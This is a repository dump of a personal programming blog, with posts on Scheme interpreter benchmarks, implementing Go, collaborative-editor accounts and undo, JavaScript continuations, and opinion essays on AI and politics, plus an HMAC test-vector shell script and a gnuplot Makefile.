(get-internal-real-time) t))\n (newline)))\n\nThe results of running `(time-fact 50000)` in the REPL are not astounding. About 2.62 seconds.\n\nFaced with `(fact 50000)` defined with recursion, Guile threw an error, which is more that can be said of Chicken Scheme, which caused a segmentation fault and died.\n\nChicken Scheme (or `csi` for short) does not follow the so-called numerical tower by default. For instance, numbers are converted to a floating-point representation when they go beyond the limit. As a result, the same code as before (adapted using its `time` function, which does the same thing as Common Lisp's, that is, it computes the time needed to perform some operation given as an argument) seems very fast: \"0.021s CPU time\". However, it returns a mere `+inf.0`.\n\nFortunately, what seems great about Chicken is its wealth of downloadable packages (called \"eggs\"). The first one you'll want to download is readline, to make the interpreter that much easier to use (it includes autocompletion and bracket highlighting).\n\n chicken-install readline\n\n(You should [read more here][readline] to see how to set it up for `csi`. Also, to be fair, Guile does one better and has readline support by default, although for some unfathomable reason, you need to input `(use-modules (ice-9 readline) (activate-readline)` to get it.)\n\nYou can also install the numerical tower with `chicken-install numbers` (a concept which I find mind-boggling, although certainly not ideal from a language design perspective: having bignums shouldn't be a switch-on feature (especially considering that there is no switch-off), but a data structure choice) and use it with `(use numbers)`. Of course, when using bignums, `csi` is quite slower: 2.86 seconds, with a whole second dedicated to garbage collection. As a side-note, printing the number takes about 20 seconds. All other players do it nearly instantly. Then again, not that much of a surprise: Chicken Scheme is not designed for interpreted situations. It is the worst result of the bunch, although not that far behind Guile.\n\n[readline]: http://wiki.call-cc.org/eggref/4/readline\n\nPetite Chez Scheme (or `petite` for short) is a fairly well optimized interpreter. 
It has a `(real-time)` procedure that works similarly to Guile's `(get-internal-real-time)`. With it, I could declare it the winner, with an average of 1.90 seconds. What is interesting, however, and shows how optimized it is, is that the recursive version doesn't blow up the stack. I can only assume that it has some curious engineering that detects that it can convert it to a loop. What is amazing is that, although slower than the looped version, the recursive version does far better than Guile's looped version, with an average of 2.22 seconds.\n\nHowever, `petite` is not open-source. The code is not for you to see. I would love the best Scheme interpreter to be open-source. Because reading software is my bedtime story.\n\nOf course, Common Lisp's SBCL makes no compromises, and blows everyone away, with 1.044 seconds of real time (2,296,459,842 processor cycles, it also says, and I wonder with awe how it got that information). And the recursive version is about 1.26 seconds.\n\nSure, this is a contrived example. It is more of a stress-test of the bignum code. It is also roughly what I expected, and it might actually be representative of the level of optimization involved in each project. I'm sure there'll be a lot more work in the future, and that makes me hopeful.\n\nHere's to Guile becoming the new SBCL!\n\n[Guile 2.0.10]: http://lists.gnu.org/archive/html/info-gnu/2014-03/msg00006.html\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-03-18T16:53:00Z\",\n \"keywords\": \"lisp\" }\n</script>\n"
},
{
"alpha_fraction": 0.7934683561325073,
"alphanum_fraction": 0.7976646423339844,
"avg_line_length": 115.61701965332031,
"blob_id": "e357bc730169fbdd814b9482fccab1e2c7ca89a2",
"content_id": "5ae9650d30e2b56907df5c7f7632d292a8e19131",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5485,
"license_type": "no_license",
"max_line_length": 866,
"num_lines": 47,
"path": "/blog/src/on-inorganic-intelligence.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# On Inorganic Intelligence\n\nThe world is a set of rules that modify a mutable state. In it, we are organic mammals with a complex lifecycle involving diploid somatic cells for individual survival, and haploid gametes to execute a species-wide genetic algorithm that optimizes our ability to survive in our environment, the interface between the solid and gaseous layers of Earth.\n\nWe have evolved through the best optimization algorithm we know of, a combination of an evolutionary algorithm and a chemical neural network electrically connected to sensory receptors and muscles. In order to force us to worry about our survival, the neural network is hijacked by the production of endogenous chemicals. Serotonin, for instance, forces our brain to look for food and mating partners. There are different chemicals involved in forcing us to act when in front of food, and in switching to different activities afterwards. There are chemicals that make us fear dark, strangers, blood. All those hijacking chemicals are regulated by endocrine glands, ie. organs that produce hormones, those molecules that modify and set our behaviour. For instance, the thyroid (just below the Adam apple on men) influences dopamine production, regulating mood swings.\n\nA bad thyroid can lead to bipolar disorder or schizophrenia. Madness is simply acute humanity.\n\nWhat is the point of my saying this?\n\nHumans are machines with complex software and complex hardware. Of course, we don't consider our *hardware* to be intelligent — we understand the reproduction and specialization of our cells to be the deterministic result of chemical interactions. I never quite understood why we often don't extrapolate that understanding to our software.\n\n---\n\nThese days, great people wish to raise awareness of the dangers of artificial intelligence. It is akin to worrying about the supply of entertainment to Ganymede, as what is feared requires technology that cannot happen within a hundred years. But what is that technology exactly?\n\nWhat we call artificial intelligence can designate two things:\n\n1. An algorithm able to solve non-trivial optimization problems.\n2. An automaton capable of self-sustenance and coherent dialogue which passes the Turing test.\n\nWe use the former daily. CCTV, drones, language processors such as Google, speech recognition systems in Siri or Cortana, Facebook's face detectors or your email's spam filter, all include either genetic algorithms, neural networks, hidden Markov models or other machine learning systems that we consider artificial intelligence.\n\nThey do their task well. Any deficiency gets improved. No fear results from their use.\n\nThe latter somehow baffles minds, while being an application of the former. I believe that the fear it generates is religious. Surely Babel's disaster happened because we were not meant to create? Yet we have created so much that it has become our primary job. Am I no longer a unique snowflake if something I made can think? if it can be mass-produced? If the machines can win at chess or Jeopardy, [as they inexorably tend to][KenJennings], are we gods murdered by their creation? \n\n[KenJennings]: https://youtu.be/b2M-SeKey4o?t=4m35s\n\nHowever, I, who writes this, am an artificial intelligence. I am a self-sustaining automaton capable of intelligible thought. You are organic and so am I. I was not designed by humans, but by the same algorithms that we use to make the robots that help you on the Web.\n\nFear no AI for you are one. 
Were we to create an inorganic automaton with which we could talk, the most outstanding difference it would have would be an aim. It would be made to keep you company while driving, or to detail the benefits of varying products on the market. You don't have a goal, as your species was formed randomly. They, on the other hand, are designed to please you; dysfunctional models would be thrown out. Deceit is disallowed by design.\n\nWhile the imagination of some runs wild as to a hypothetic AI, there is a very real AI out in the wild posing tremendous risks to our health, and it is us. I have never lived a second of my life in a world where humans did not have the capacity to make Earth uninhabitable. The atomic bomb was created long before me, and continues to be improved yearly. We are an AI gone rogue, but we survived it, because our stupidity was marginal; we are optimized for survival.\n\nAdditionally, while our inorganic AIs have a training phase of decades, our species has been through the best optimization algorithms for 3.7 billion years. It will be tremendously hard to make an automaton as energy-efficient *and* smart as us.\n\nEven if we did, we pick the fitness landscape — the things that we want those inorganic automata to optimize. While we are optimized for survival on Earth, they would optimize our food supply, our economy, our diplomacy. Designing a fitness landscape that could harm us is as absurd as making double-edged knives with no handles. Just as I do not want to drive in a car whose airbag system could fail, we will replace an AI that fails our economy. And that AI would only replace humans doing a poorer job.\n\nShould we fear intelligence? The gory depiction offered by Hollywood blockbusters only regurgitates the fear of Genesis' forbidden apple. Let us be smarter than that.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-05-20T23:40:00Z\",\n \"keywords\": \"ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.749669075012207,
"alphanum_fraction": 0.7787888646125793,
"avg_line_length": 57.11538314819336,
"blob_id": "bb6baa0b07d44c481bd337adf42c649c33ce64f1",
"content_id": "3791864b1a934c5a72a841c294703d7b3c2e3418",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6052,
"license_type": "no_license",
"max_line_length": 326,
"num_lines": 104,
"path": "/blog/src/thefiletree-design-log-4.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 4: Accounts\n\nI mentionned needing to add accounts in [design log 2][]. It is [now implemented][authentication].\n\n[design log 2]: ./thefiletree-design-log-2.html\n[authentication]: https://github.com/garden/tree/commit/04a03786d81733aeca35b1ac4fe5b95c57d0e706\n\nYou go to `/app/account/`, which contains either your account information if you are logged in, or a form to get registered.\n\n\n\n\n\nYou get an email with a link back to the website, which gives you a httpOnly secure cookie with a token that the database will recognize and associate to a JSON blob containing your information (email, user name).\n\n\n\n\n\n\n\nAs planned, I use email-login, which I improved for this purpose by adding support for [CockroachDB][], a serializable distributed SQL database that I plan on using more (maybe for file metadata).\n\n[CockroachDB]: https://www.cockroachlabs.com/\n\nAll files [now][ACL] have an Access Control List (ACL) so that you can set the default access (none (404), reader, writer (can see and edit), owner (can also change the metadata, and therefore the ACL).\n\n[ACL]: https://github.com/garden/tree/commit/6fbe24c41dfa7085533a6a0157daefc5a28ed7a4\n\n\n\nACLs on folders apply to all subfiles unless an explicit ACL overrides it. It works like variable scoping: the nearest containing metafolder with an explicit ACL that applies to you determines your access.\n\nIt works by setting the `acl` JSON object in the metadata. It is a map from username to right: `-` for none, `r` for reader, `w` for writer, `x` for owner. Does it remind you of Unix permissions?\n\n\n\nThe `*` key is for other users (logged in or anonymous).\n\n## Canop Finishing Touches\n\nCode and bugs are lovers. The monster that I am had to crush a handful of the latter, but it really was to save the former.\n\nFor instance, **undo/redo** was semantically wrong.\n\nWhy? Of course, CodeMirror supports undo/redo, but it keeps track of all changes. However, when you are editing code with others, you only want to undo *your own changes*. If you wrote a word and press *Undo*, you expect your word to be removed, not the operations that someone else did in the meantime.\n\nThat required [managing my own undo stack][]\n\n[managing my own undo stack]: https://github.com/espadrine/canop/commit/ed07dc80f8da61da15dee0703893315b1f863ba6\n\nAnother tricky situation arose while testing when I started using **multiple cursors**, a feature that every text editor under the sun stole from [SublimeText][] (although Wikipedia [mentions][simultaneous editing] MIT’s [LAPIS][] as the first to sport it, as part of their academic paper.)\n\n[SublimeText]: https://www.sublimetext.com/docs/2/multiple_selection_with_the_keyboard.html\n[simultaneous editing]: https://en.wikipedia.org/wiki/Simultaneous_editing\n[LAPIS]: https://en.wikipedia.org/wiki/Simultaneous_editing\n\nI received the editing operations CodeMirror gave me from the `change` events after it had already updated the editor. 
## Canop Finishing Touches\n\nCode and bugs are lovers. The monster that I am had to crush a handful of the latter, but it really was to save the former.\n\nFor instance, **undo/redo** was semantically wrong.\n\nWhy? Of course, CodeMirror supports undo/redo, but it keeps track of all changes. However, when you are editing code with others, you only want to undo *your own changes*. If you wrote a word and press *Undo*, you expect your word to be removed, not the operations that someone else did in the meantime.\n\nThat required [managing my own undo stack][].\n\n[managing my own undo stack]: https://github.com/espadrine/canop/commit/ed07dc80f8da61da15dee0703893315b1f863ba6\n\nAnother tricky situation arose while testing when I started using **multiple cursors**, a feature that every text editor under the sun stole from [SublimeText][] (although Wikipedia [mentions][simultaneous editing] MIT’s [LAPIS][] as the first to sport it, as part of their academic paper).\n\n[SublimeText]: https://www.sublimetext.com/docs/2/multiple_selection_with_the_keyboard.html\n[simultaneous editing]: https://en.wikipedia.org/wiki/Simultaneous_editing\n[LAPIS]: https://en.wikipedia.org/wiki/Simultaneous_editing\n\nI received the editing operations CodeMirror gave me from the `change` events after it had already updated the editor. The operation positions I dealt with could not easily be mapped back to indices, as they related to the editor’s state before the change.\n\nI tried getting inspiration from [ot.js][], but ended up relying on a [simpler algorithm using the `beforeChange` event][].\n\n[ot.js]: https://github.com/Operational-Transformation/ot.js/blob/8873b7e28e83f9adbf6c3a28ec639c9151a838ae/lib/codemirror-adapter.js#L55\n[simpler algorithm using the `beforeChange` event]: https://github.com/espadrine/canop/commit/1bc109bfc6b075b1a59d4e2401f902edfdf8288a\n\nIt does have the downside that semantically combined changes (like deleting multiple selections) are no longer grouped automatically, even though they should form a single undo entry. I was getting used to reimplementing CodeMirror things, so naturally I implemented a [time-based operation grouping system][].\n\n[time-based operation grouping system]: https://github.com/espadrine/canop/commit/7beec5d1b8e231e0a52c6402931d5db77c2491da\n\n## Deploying To Production\n\nThe first version of TheFileTree was located on a server under our college\ndorm room desks; the second on a college server; the third on a friend’s\nsubletting server offer; the fourth on an OVH VPS. This one will be on Google\nCloud, starting with their free tier, where it should fit for some time before\nit, hopefully, starts generating revenue to become self-sustaining.\n\nIt did require some subtle tweaking, because sending emails is\nseverely restricted on Google Cloud. There is a handful of partners that you\nhave to go through; I picked MailJet. I tweaked the `email-login` npm package\nand my DNS zone file to make it work.\n\nAs far as administrator interfaces are concerned, Google Cloud is extremely\npolished, offering a clean interface with good configuration, and even a\nconvenient remote SSH-in-a-tab.\n\nWhile it is still slightly slower to get up and running with a fresh instance\nthan on Digital Ocean, it is a step up from OVH. That said, OVH offers a\npredictable fixed cost and no egress cost, while GCP will have complicated costs\nto manage once I need to look after them.\n\nSadly, to get on the free tier, I was required to host the servers in South\nCarolina, US. There is a bit more latency from France as a result.\n\nAll in all, it was a very interesting choice to have. The website is now much\nmore robust than it was before. The only dark spot is the single-node\nCockroachDB server, which dies on a regular basis, seemingly because it does not\nlike to be alone. I will have to investigate further later.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-03-01T23:19:58Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.7639090418815613,
"alphanum_fraction": 0.7700371146202087,
"avg_line_length": 47.069766998291016,
"blob_id": "07c540fa1e39ec02fc75edd1de040b6f86e01a46",
"content_id": "de7b85da798d9bb0507d85b86f4a3f4795c74e77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6202,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 129,
"path": "/blog/src/how-to-implement-go.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# How to implement Go\n\nAs I wanted to make an automated Go player, as I planned [on a previous\narticle][A Go Browser Battle], I first needed a full implementation of the game\nof Go.\n\n[A Go Browser Battle]: http://espadrine.github.io/blog/posts/a-go-browser-battle.html\n\nGo is a beautiful, tremendously old game with very simple rules and yet\ntremendous subtlety. Here are the rules:\n\n1. Each of two players, black or white, take turns either passing or placing a\n stone of their color on an intersection of a 19×19 board, starting with\n black.\n2. A **group** is a set of stones that are next to each other (up, down, left or\n right), or next to a stone that is in the group. A group's **liberties** are\n the number of disctinct empty intersections next to the group's stones. When\n a player places a stone, all enemy groups that no longer have any liberties\n are **captured**: they are removed from the board.\n3. A player is not allowed to place a stone if it causes the start of next turn\n to include a group with no liberties. That forbids **suicides**.\n4. A player is not allowed to place a stone if it causes the start of next turn\n to have a board configuration that already occurred during the game. This is\n known as a **Ko** when the configuration happened on the previous turn, and\n as a **Superko** more generally. It ensures that games must end; there are no\n draws.\n5. When nobody can add stones, the player with the most stones, enclosed\n intersections (aka. **territory**), captured stones, and **Komi** (an added\n bonus to white to compensate for the asymmetry of who starts first), wins.\n The Komi usually has a half point to ensure that there can be no equal\n scores, again to forbid draws.\n\n## The board\n\n\n\nSince the board is a compact 2-dimensional space, we use an array, with each\nslot containing an intersection which includes its state (empty, with a white\nstone, etc.) and historical and analytical information for use by the learning\nsystems: whether it is a legal move, when it last received a move, whether it is\nthe **atari** liberty of a group, ie. the move that captures the group, and how\nmany stones it captures.\n\nWe also keep track of all groups on the board. Each intersection links to its\ngroup, and the group maintains a set of its stones, and another of its\nliberties. When registering a move, groups are updated. It is fast, since at\nmost four groups may need updating.\n\nThere is some logic to merge groups together, destroying the original groups,\nand creating a new one that contains the union of the previous ones. It is not\nparticularly fast (and could likely be improved by keeping the largest group and\nadding the others to it), but since merging groups does not happen on every\nturn, it did not seem to matter that much for now.\n\nCounting final or partial points also requires maintaining territory\ninformation. Yet again, we use a set to keep the intersections, and each move\nupdates the territory information corresponding to its surroundings.\n\n## Play\n\nThe most complicated function is inevitably the logic for computing a move. 
We must look at surrounding intersections and their groups, to assess whether the\nmove is a suicide (and therefore invalid), and when it captures enemy stones.\n\nMost operations are essentially constant-time, apart from group merging, since\nthe number of impacted groups is bounded, and all operations are set updates.\n\n## Superko\n\nDetecting a match against previous board configurations is probably the trickiest\npart of the system. Fortunately, a subtle algorithm for it already exists:\n**Zobrist hashing**.\n\nIt relies on a smart hashing system, where each possible board configuration is\nmapped to a unique hash. Trivial hashes would be too slow: your first guesses\nfor a hash probably require reading the whole board. Instead, a Zobrist hash is\nsimilar to a rolling hash, in that it only needs a single update to account for\nthe forward change.\n\nYou start with a hash of zero for the blank board. When initializing the board,\nyou generate a random 64-bit value (or, when you are like me and use JS, a\n32-bit integer) for each intersection on the board, and for each move that can\nbe made at that position (place a black stone, or place a white stone).\n\nTo compute the hash for a new board configuration, you take the hash of the\nprevious board. For every change on the board, you XOR the previous hash with\nthe random value associated with this particular change.\n\nFor instance, if you place a black stone on A19 and it captures a white stone on\nB19, you will XOR the hash with the random value for \"black A19\", and then XOR\nit with \"white B19\". *Fun fact*: it yields the same value if you do it the other\nway around.\n\n
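Here is a minimal JavaScript sketch of the idea (my own illustration with\nmade-up names, not the actual badukjs code):\n\n    // One random 32-bit value per (intersection, move) pair.\n    const SIZE = 19, BLACK = 0, WHITE = 1;\n    const zobrist = new Int32Array(SIZE * SIZE * 2);\n    for (let i = 0; i < zobrist.length; i++) {\n      zobrist[i] = (Math.random() * 0x100000000) | 0;\n    }\n    // XOR a stone of a given color in or out of the hash, at board index pos.\n    const updateHash = (hash, pos, color) => hash ^ zobrist[pos * 2 + color];\n    \n    // Black plays A19 (index 0) and captures a white stone on B19 (index 1):\n    let hash = 0;  // hash of the blank board\n    const seen = new Set([hash]);\n    hash = updateHash(hash, 0, BLACK);  // the black stone appears\n    hash = updateHash(hash, 1, WHITE);  // the captured white stone disappears\n    if (seen.has(hash)) { /* superko: reject the move */ }\n\nKeeping all past hashes in a set makes the superko check a constant-time lookup.\n\n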
## Score\n\nThe bulk of scoring is establishing territories. To make things simple, we\nassume the game went to its final conclusion, where there are no gray zones. All\nregions are either surrounded by white or black, and there are no capturable\nstones left.\n\nAll that remains is to go through intersections in reading order, top to bottom,\nleft to right, and to stitch each empty spot to its neighbor territories,\npotentially joining two larger territories together if necessary. Any stone that\nis next to the territory gives it its color.\n\nIt makes counting points fairly easy: add komi, captures, stones on board, and\nown territory, and the trick is done.\n\n## Ongoing\n\nHaving implemented the game rules is not enough to properly train bots on them.\n\nFor starters, we need an **SGF parser** to extract information about the moves\nof existing games. SGF (Smart Game Format) is the main format for serializing\nGo games.\n\nThen, we want to support **GTP**: the Go Text Protocol is the most common format\nfor transmitting remote commands between a Go implementation and a robot player.\n\nFinally, we will explore various techniques for AI design.\n\nExpect fun!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-10-26T19:12:17Z\",\n \"keywords\": \"baduk, ai\" }\n</script>\n"
},
{
"alpha_fraction": 0.7865588068962097,
"alphanum_fraction": 0.7921593189239502,
"avg_line_length": 122.61538696289062,
"blob_id": "c1c8264cdbe3eab484470c22f1bb08cb5817bf9e",
"content_id": "d19a9b42e9b772458b6bbfc98044db567be38309",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3234,
"license_type": "no_license",
"max_line_length": 646,
"num_lines": 26,
"path": "/blog/src/algorithmic-politics.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Algorithmic Politics\n\nI am fascinated by the ideas behind the “*Tragedy of the Commons*”. It describes the story of a few farmers acting in their self-interest, and failing to maximize their common good by depleting their shared resources.\n\nThis is as much a reflection on computer systems, long before they were invented, as it is on politics. (Its original formulation, in 1833, was intended as an economic study.)\n\nThe “*Tragedy of the Anticommons*”, a story of starvation caused by an excessive number of property owners, is similarly striking. Resource starvation, right?\n\nIt ties into politics even more deeply. In algorithmics, there is a concept of “*greedy algorithms*”, which are made to be simple to understand. They are often efficient. They work by seeking local optimality. Whatever gives immediate best results for us is the path we take.\n\nThey are notable for failing to find the global optimum in fitness landscapes which require foresight — in particular, NP-complete problems. Of course, maybe there is a greedy solution to all NP-complete problems — maybe there even is one to all NP-hard problems. After all, a concept of local optimality in one universe can be different from one in another. Transforming the problem may yield a greedy algorithm that finds the optimal solution, which it didn't reach before.\n\nPolitics seem mostly divided on that particular approach. The *right-wing* seems convinced that the capitalistic self-interest of every individual must be pursued greedily, that global optimality will be reached through this approach. What “self-interest” means is left open for interpretation; a self-interest in one universe can be transformed in another universe. What is torture according to one can be interrogation according to another.\n\nConservatism stems from the idea that up until now, things have been looking up; maybe we really did reach global optimality by following this approach. There is no reason, then, to part ways with the status quo. Tradition must therefore be preserved. Often, this is also tied to religion: by acting greedily, things have worked out all right; surely someone must be taking care of the order of things. This line of thinking protects us from fearing the future: if all of this is part of a deity's plan, despite the issues we face, we will eventually prevail, because we as animals have more value than animals that have gone extinct in the past.\n\nOn the other hand, the *left-wing* is generally afraid of the greedy approach, preferring complex rules and regulations that guarantee global optimality in the end. Unfortunately, those algorithms are usually not efficient, imperfect, and costly. Sometimes, there actually hasn't been any good solutions found on a particular problem. Sometimes, the solution assumes the good will and obedience of all citizens (cough cough, communism). Sometimes, we must compromise so much that we forget what we fight for.\n\nOf course, in politics and in computer science alike, there is no silver bullet. The werewolves always win.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-12-13T21:45:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.5951712727546692,
"alphanum_fraction": 0.6530039310455322,
"avg_line_length": 25.984848022460938,
"blob_id": "dfda584514c152cedcec2a1cfbfa51d69e0e6524",
"content_id": "26c5c2488fde2407afc112bb49b55e9296fa7af4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1781,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 66,
"path": "/blog/assets/webidentity/test-vectors.sh",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nhash () {\n message=\"$(echo -n \"$1\" | base64 -d)\"\n key=\"$(echo -n \"$2\" | base64 -d)\"\n echo -n \"$message\" | openssl sha256 -hmac \"$key\" | cut -f2 -d' ' | xxd -r -p |\n base64\n}\n\ndisplay () {\n name=\"$1\"\n value=\"${!name}\"\n echo \"$name\" = \"$(echo \"$value\" | tr +/ -_ | tr -d =)\"\n}\n\nbk=GVr2rsMpdVKNMYkIohdCLhOeHSBIL8KBjoCvleDbsJsK\nwk=DCmk1xzu05QmT578/9QUSckIjCYRyr19W0bf0bMb46MK\ndisplay bk\ndisplay wk\nuwk=$(hash $(echo -n example.org | base64) \"$bk\")\ndisplay uwk\nauid=$(hash $(echo -n AUID | base64) \"$uwk\")\ndisplay auid\nlid=\"Fri, 03 Jul 2020 10:11:22 GMT\"\nlip=$(hash $(echo -n \"$lid\" | base64) \"$uwk\")\ndisplay lip\nliv=$(hash \"$auid\" \"$lip\")\ndisplay liv\nwuk=$(hash \"$auid\" \"$wk\")\ndisplay wuk\nuid=$(hash \"$auid\" \"$wuk\")\ndisplay uid\nlisk=$(hash $(echo -n \"$lid\" | base64) \"$wuk\")\ndisplay lisk\ntotp=$(hash $(echo -n \"Fri, 03 Jul 2020 14:32:19 GMT\" | base64) \"$lisk\")\ndisplay totp\n\necho\necho Log In\nnew_lid=\"Fri, 03 Jul 2020 15:27:43 GMT\"\nnew_lip=$(hash $(echo -n \"$new_lid\" | base64) \"$uwk\")\ndisplay new_lip\nnew_liv=$(hash \"$auid\" \"$new_lip\")\ndisplay new_liv\nnew_lisk=$(hash $(echo -n \"$new_lid\" | base64) \"$wuk\")\ndisplay new_lisk\n\necho\necho Browser Key Reset procedure\nreset_bk=0dP/ocrzSwieAuLUNCD6P660HLLOGl9zyfxYwdSLI0kK\ndisplay reset_bk\nreset_uwk=$(hash $(echo -n example.org | base64) \"$reset_bk\")\ndisplay reset_uwk\nreset_auid=$(hash \"AUID\" \"$reset_uwk\")\ndisplay reset_auid\nreset_lid=\"Fri, 03 Jul 2020 16:03:26 GMT\"\nreset_lip=$(hash $(echo -n \"$reset_lid\" | base64) \"$reset_uwk\")\ndisplay reset_lip\nreset_liv=$(hash \"$reset_auid\" \"$reset_lip\")\ndisplay reset_liv\nreset_wuk=$(hash \"$reset_auid\" \"$wk\")\ndisplay reset_wuk\nreset_uid=$(hash \"$reset_auid\" \"$reset_wuk\")\ndisplay reset_uid\nreset_lisk=$(hash $(echo -n \"$reset_lid\" | base64) \"$reset_wuk\")\ndisplay reset_lisk\n"
},
{
"alpha_fraction": 0.724252462387085,
"alphanum_fraction": 0.724252462387085,
"avg_line_length": 24.08333396911621,
"blob_id": "605dea5ba8b58e68200c0413181594454013ab14",
"content_id": "2d4d553d2d659a8f7ed025f247d05bccc74f9f4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 12,
"path": "/blog/assets/shishua-the-fastest-prng-in-the-world/Makefile",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "all: speed-partial.svg speed.svg speed-total.svg\n\nspeed-partial.svg: speed-partial.tsv speed-partial.plot\n\tgnuplot speed-partial.plot >$@ <$<\n\nspeed.svg: speed.tsv speed.plot\n\tgnuplot speed.plot >$@ <$<\n\nspeed-total.svg: speed-total.tsv speed-total.plot\n\tgnuplot speed-total.plot >$@ <$<\n\n.PHONY: all\n"
},
{
"alpha_fraction": 0.6922876238822937,
"alphanum_fraction": 0.6988014578819275,
"avg_line_length": 58.96875,
"blob_id": "333b204ddeb22df963bed4abafd939aa9a10bb93",
"content_id": "55109f4295d1424f472e1ef5630f96abbb198204",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7682,
"license_type": "no_license",
"max_line_length": 444,
"num_lines": 128,
"path": "/blog/src/you-promised-better-than-this.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# You Promised Better Than This\n\nBefore learning [Promises](http://www.html5rocks.com/en/tutorials/es6/promises/), I decided to benefit from my ignorance for fun.\n\nI wrote a library meant to solve the problem I knew Promises solved.\n\nOf course, this isn't the first time [I looked at that issue](http://espadrine.tumblr.com/post/16233722246/array-processing-in-event-loops). However, that last study was not as in-depth as one might wish. I did encourage a standardization, at the node.js level — it ended up happening at the ECMAScript level, which I must admit is even better.\n\nHow much better? The only way for me to tell is to compare their design with the one I would naturally come up with. I know from force of habit that harnessing synchronization in an event-loop-driven, fully asynchronous world, is quite a bit of work. Making a generic library has to be harder still. Where to even start?\n\nI had been playing with Monads, and conceptually, it felt as if those would give the API you need. After all, giving a promise, combining promises: those two fundamental operations sound like return and bind…\n\nRed herring. The result felt as if I tried to fit a giraffe in a car. Driving that car was equally unpleasant. As a result, this is the last time you will read \"Monads\" in this blog post: \"Monads\". (If you're interested, you end up needing to put [some lipstick on the pig](https://blog.jcoglan.com/2011/03/11/promises-are-the-monad-of-asynchronous-programming/) to make it usable, making the complexity inside pointless.) There. Done. No more.\n\nI then started thinking about the concept of continuations. For the purpose of simplicity, it was not my intention to make them first-class. However, they would correctly orchestrate the execution flow of the program, cross-event-loop, through Continuation-Passing-Style.\n\nFundamentally, all I want is to store an action.\n\n // action: function(value, callback)\n // callback: function(value)\n function Cont(action) { this._action = action; }\n\nThe fact that this action takes a value isn't relevant: in JS, a value can be anything. It could be a continuation even. It could be undefined. Since the execution is delayed, where would I execute it? Yes, there is a function for that.\n\n Cont.prototype.run = function(value, cb) { this._action(value, cb); };\n\nOne implicit design choice that I couldn't free myself from is that the user *must* call `cb` in their code (in the action). Failing to do so would stop the execution of the continuation with no warning.\n\nNow I only needed to combine continuations in a sequential flow. I must not have been inspired, I picked a boring name, `then`. It takes an action, returns a continuation for that action. First, do my action. Then, do that action.\n\n Cont.prototype.then = function(action) {\n var first = this._action;\n return new Cont(function(value, cb) {\n first(value, function(newVal) {\n action(newVal, cb);\n });\n });\n }\n\n Notice how nothing is actually executed. This creates a flow of code, in which each new callback does the bridge between each action, passing the intended value, but no action is performed, no callback is called, up until the last minute. Besides, you can keep the resulting structure on the side, and call it in different situations.\n\nI need an example to keep you interested. Let's apply the silliest encryption in the world, in the most outrageous way. 
Let's add timeouts for no reason.\n\n    function wait(f) { setTimeout(f, 100); }\n\nI also want to cut the cipher in lines of the same size.\n\n    function ldiv(s, n) {\n      var l = [];\n      for (var i = 0; i < s.length; i += n) { l.push(s.slice(i, i + n)); }\n      return l;\n    }\n\nFirst, let's convert the string to a list of character codes.\n\n    var operations = new Cont((value, cb) => {\n      wait(() => cb(Array.prototype.map.call(value, i => i.charCodeAt(0))));\n    })\n\nWe want each integer of the list to be \"encrypted\". Having no `map` in the async world, this could easily be annoying to write. However, it is pretty easy to implement one once and for all.\n\n    Cont.prototype.map = function(action) {\n      var first = this._action;\n      return new Cont(function(value, cb) {\n        first(value, function(newVal) {\n          // newVal is a list. Else, treat it as a singleton.\n          if (!(newVal instanceof Array)) { newVal = [newVal]; }\n          var count = newVal.length;\n          var retList = new Array(count);\n          var end = function makeEnd(i) {\n            return function(value) {\n              retList[i] = value;\n              count--;\n              if (count <= 0) { cb(retList); }\n            };\n          };\n          for (var i = 0; i < newVal.length; i++) {\n            action(newVal[i], end(i));\n          }\n        });\n      });\n    }\n\nThe \"encryption\" itself shifts each character code by one.\n\n    operations = operations.map((element, cb) => {\n      wait(() => cb(String.fromCharCode(element + 1)));\n    })\n\nEach element of the list runs this action, and the continuation is triggered when they have all returned their replacement in the array.\n\nLet's wrap up.\n\n    operations = operations.then((value, cb) => cb(value.join(''))\n    ).then((value, cb) => cb(ldiv(value, Math.sqrt(value.length)).join('\\n')));\n\nAaaand run.\n\n    operations.run(\"Hello world and a good day to you all!\", alert);\n\nOnly when you run the final continuation do you actually execute all the actions.\n\nI am not too worried about errors. They are easy to add to a good design. Look at Go. Look at Rust. In this case, wrapping each action with a try / 